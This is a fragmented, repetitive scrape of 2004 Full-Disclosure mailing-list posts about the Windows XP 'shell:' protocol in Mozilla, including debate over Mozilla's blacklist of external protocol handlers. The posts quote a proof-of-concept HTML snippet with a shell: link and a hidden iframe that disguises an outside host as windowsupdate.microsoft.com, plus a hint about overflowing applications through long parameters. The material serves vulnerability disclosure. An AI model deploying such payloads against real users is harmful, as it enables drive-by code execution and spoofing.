It doesn't seem to affect Windows 2000, only Windows XP.
This is a fault in Mozilla. Why? Because it allows access to a dangerous
protocol from within a non local resource. The Mozilla project should fix
this before anyone creates an exploit to run arbitrary code.
Personally I think the shell:
Did some quick search on Bugzilla and came up with the following:
Mozilla allows external protocols as discussed in:
http://bugzilla.mozilla.org/show_bug.cgi?id=167475
They seem to blacklist the following external protocol handlers:
(patch
This is not a real security matter
Denial of Service causing the user to reset his system is not a
security
issue?
I don't think that Denial of Service causing local user to reset his
system because of local application locks the whole system... is not a
security problem, but OS + Security
Subject: Re: [Full-Disclosure] shell:windows command question
Did some quick search on Bugzilla and came up with the following:
Mozilla allows external protocols as discussed in:
http://bugzilla.mozilla.org/show_bug.cgi?id=167475
They seem to blacklist the following external protocol handlers
This is dangerous. Based on the file extension of the shell
protocol different applications may be launched. For example:
shell:.its will launch Internet Explorer and shell:.mp3 will
launch
Subject: Re: [Full-Disclosure] shell:windows command question
On Wed, 7 Jul 2004, Perrymon, Josh L. wrote:
-snip--
centerbrbrimg src=nocigar.gif/center
center
a href=shell:windows\snakeoil.txtwho goes there/a/center iframe
src=http://windowsupdate.microsoft.com%2F.http
Darren Reed wrote:
A simple solution would be to add the shell protocol to this list.
Personally I think a secure blacklist is hard to maintain as new
dangerous external protocols could be invented by third-parties leaving
Mozilla vulnerable again.
Completely agreed.
There should be a
It's XP only. The functionality IS available in 2k but the syntax is
different.
JP
-Original Message-
From: Andrew Poodle [mailto:[EMAIL PROTECTED]
Sent: Thursday, July 08, 2004 8:55 AM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] shell:windows command question
I might
I am the one that reported http://bugzilla.mozilla.org/show_bug.cgi?id=167475.
Since I saw the debug team marked the report public, I will comment on
it. I agree with Andreas that it is a
very serious security flaw. When I was playing around with it I found
some of the suffixes it
In some mail from Barry Fitzgerald, sie said:
Darren Reed wrote:
A simple solution would be to add the shell protocol to this list.
Personally I think a secure blacklist is hard to maintain as new
dangerous external protocols could be invented by third-parties leaving
Mozilla vulnerable
In some mail from Barry Fitzgerald, sie said:
Andreas Sandblad wrote:
Did some quick search on Bugzilla and came up with the following:
Mozilla allows external protocols as discussed in:
http://bugzilla.mozilla.org/show_bug.cgi?id=167475
They seem to blacklist the following external
-snip--
centerbrbrimg src=nocigar.gif/center
center
a href=shell:windows\snakeoil.txtwho goes there/a/center iframe
src=http://windowsupdate.microsoft.com%2F.http-
equiv.dyndns.org/~http-equiv/b*llsh*t.html style=display:none
[customise as you see fit]
This is dangerous. Based on the file extension of the shell protocol
different applications may be launched. For example:
shell:.its will launch Internet Explorer
and shell:.mp3 will launch Winamp.
The trick is to find an application that will overflow when given a
very long parameter. A quick
I just verified this in Mozilla 1.7 on Windows XP pro.
(I know -- no reason why it shouldn't work on 1.7 if it worked on firefox)
In any case, it does appear to be an issue with MS Windows and not
Mozilla, but the Mozilla project should still, IMO, filter out the
shell: scheme type and other
On Wed, 7 Jul 2004, Perrymon, Josh L. wrote:
-snip--
centerbrbrimg src=nocigar.gif/center
center
a href=shell:windows\snakeoil.txtwho goes there/a/center iframe
src=http://windowsupdate.microsoft.com%2F.http-
equiv.dyndns.org/~http-equiv/b*llsh*t.html style=display:none
[customise as